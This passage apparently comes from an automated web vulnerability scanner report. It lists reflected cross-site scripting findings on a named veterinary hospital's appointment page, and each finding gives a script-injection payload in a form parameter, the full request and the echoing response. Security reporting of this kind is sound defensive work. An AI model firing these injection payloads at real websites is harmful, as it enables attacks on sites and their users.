%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:47:30 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=3iaem1hmp6hv9mq27eu3sdqt14; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 23558 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input name="other" id="other" type="text" size="40" class="req" maxlength="255" value="7a872"><script>alert(1)</script>e5865d0001d " />...[SNIP]...
2.107. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [petage parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the petage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5494"><script>alert(1)</script>954e538de19 was submitted in the petage parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=f5494"><script>alert(1)</script>954e538de19 &petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1
%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:47:34 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=rck5nv710n6smmo8j1o5au3gj1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 23558 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input name="petage" id="petage" type="text" size="15" maxlength="50" value="f5494"><script>alert(1)</script>954e538de19 " />...[SNIP]...
2.108. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [petname parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the petname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f62a9"><script>alert(1)</script>48aa8f098b1 was submitted in the petname parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=f62a9"><script>alert(1)</script>48aa8f098b1 &pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1
%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:47:39 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=d24coc2ad0oa7sgdfpbfikjlv2; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 23558 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input name="petname" id="petname" type="text" size="20" maxlength="50" value="f62a9"><script>alert(1)</script>48aa8f098b1 " />...[SNIP]...
2.109. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [pettype parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the pettype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37f7f"><script>alert(1)</script>e984da2d97e was submitted in the pettype parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=37f7f"><script>alert(1)</script>e984da2d97e &phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1
%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:47:44 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=dqg12p4d53qnj55akadef34au0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 23515 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... al/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=37f7f"><script>alert(1)</script>e984da2d97e &phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-vet...[SNIP]...
2.110. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [phone parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d23b"><script>alert(1)</script>c192c8c7378 was submitted in the phone parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=8d23b"><script>alert(1)</script>c192c8c7378 &reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1
%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:47:49 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=1ulacnh0hcc7s695g9fao52rn6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 23558 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input name="phone" id="phone" type="text" size="30" maxlength="20" value="8d23b"><script>alert(1)</script>c192c8c7378 " />...[SNIP]...
2.111. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [reason parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the reason request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32c7e"><script>alert(1)</script>90a0eb32c87 was submitted in the reason parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=32c7e"><script>alert(1)</script>90a0eb32c87 &referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1
%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:47:53 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=2fopkg0805iekeqe17d0m8pkk2; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 23515 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... tphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=32c7e"><script>alert(1)</script>90a0eb32c87 &referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospita...[SNIP]...
2.112. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [referer parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the referer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60be4"><script>alert(1)</script>496b4f91b44 was submitted in the referer parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=60be4"><script>alert(1)</script>496b4f91b44 &source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1
%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:47:58 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=kj92hmpgpn5u0e6c6lisgdjpj2; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 23515 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... mpm1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=60be4"><script>alert(1)</script>496b4f91b44 &source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt....[SNIP]...
2.113. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [source parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 321c7"><script>alert(1)</script>32eff3265ff was submitted in the source parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital321c7"><script>alert(1)</script>32eff3265ff &submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526